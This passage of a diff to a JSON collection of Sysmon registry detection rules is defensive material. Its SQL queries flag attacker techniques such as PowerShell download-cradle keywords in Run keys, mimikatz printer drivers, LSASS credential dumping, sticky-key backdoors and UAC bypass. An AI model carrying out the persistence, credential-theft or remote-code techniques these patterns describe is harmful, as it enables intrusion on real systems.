"critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_susp_printer_driver.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "Suspicious Powershell In Registry Run Keys", - "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "status": "experimental", - "description": "Detects potential PowerShell commands or code within registry run keys", - "author": "frack113, Florian Roth", + "title": "New DLL Added to AppCertDlls Registry Key", + "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "status": "test", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "author": "Ilyas Ochkov, oscd.community", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1546.009" ], "falsepositives": [ - "Legitimate admin or third party scripts. Baseline according to your environment" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh %' ESCAPE '\\' OR Details LIKE '%FromBase64String%' ESCAPE '\\' OR Details LIKE '%.DownloadFile(%' ESCAPE '\\' OR Details LIKE '%.DownloadString(%' ESCAPE '\\' OR Details LIKE '% -w hidden %' ESCAPE '\\' OR Details LIKE '% -w 1 %' ESCAPE '\\' OR Details LIKE '%-windowstyle hidden%' ESCAPE '\\' OR Details LIKE '%-window hidden%' ESCAPE '\\' OR Details LIKE '% -nop %' ESCAPE '\\' OR Details LIKE '% -encodedcommand %' ESCAPE '\\' OR Details LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR Details LIKE '%Invoke-Expression%' ESCAPE '\\' OR Details LIKE '%IEX (%' ESCAPE '\\' OR Details LIKE '%Invoke-Command%' ESCAPE '\\' OR Details LIKE '%ICM -%' ESCAPE '\\' OR Details LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR Details LIKE '%IWR %' ESCAPE '\\' OR Details LIKE '% -noni %' ESCAPE '\\' OR Details LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_in_run_keys.yml" + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" }, { - "title": "DNS-over-HTTPS Enabled by Registry", - "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", - "status": "test", - "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "author": "Austin Songer", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1112" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND Details = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_dns_over_https_enabled.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "ScreenSaver Registry Key Set", - "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", - "status": "experimental", - "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "status": "test", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Legitimate use of screen saver" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND Details LIKE '%.scr' ESCAPE '\\') AND NOT ((Details LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_scr_file_executed_by_rundll32.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", + "title": "New DLL Added to AppInit_DLLs Registry Key", + "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "status": "test", + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1546.010" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "registry_set_disable_system_restore.yml" + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" }, { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", + "title": "Atbroker Registry Change", + "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", + "author": "Mateusz Wydra, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1218", "attack.persistence", - "attack.t1547.010" + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Creation of non-default, legitimate at usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" ], - "filename": "registry_set_add_port_monitor.yml" + "filename": "registry_event_susp_atbroker_change.yml" }, { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", - "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", - "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "status": "experimental", - "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", - "author": "frack113", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1574" + "attack.t1136.001" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_dbgmanageddebugger_persistence.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", + "title": "Windows Registry Trust Record Modification", + "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "status": "test", + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" + "Alerts on legitimate macro usage as well, will need to filter as appropriate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" + "filename": "registry_event_trust_record_modification.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", + "status": "test", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" + "attack.persistence", + "attack.t1547.001" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "Winlogon AllowMultipleTSSessions Enable", - "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.privilege_escalation", "attack.persistence", - "attack.defense_evasion", - "attack.t1112" + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use of the multi session functionality" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND Details LIKE '%DWORD (0x00000001)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Disable Privacy Settings Experience in Registry", - "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", - "status": "experimental", - "description": "Detects registry modifications that disable Privacy Settings Experience", - "author": "frack113", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Legitimate admin script" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_privacy_settings_experience.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Allow RDP Remote Assistance Feature", - "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "status": "experimental", - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "author": "frack113", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Legitimate use of the feature (alerts should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "Disable Windows Firewall by Registry", - "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", - "status": "experimental", - "description": "Detect set EnableFirewall to 0 to disable the windows firewall", - "author": "frack113", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "status": "test", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel 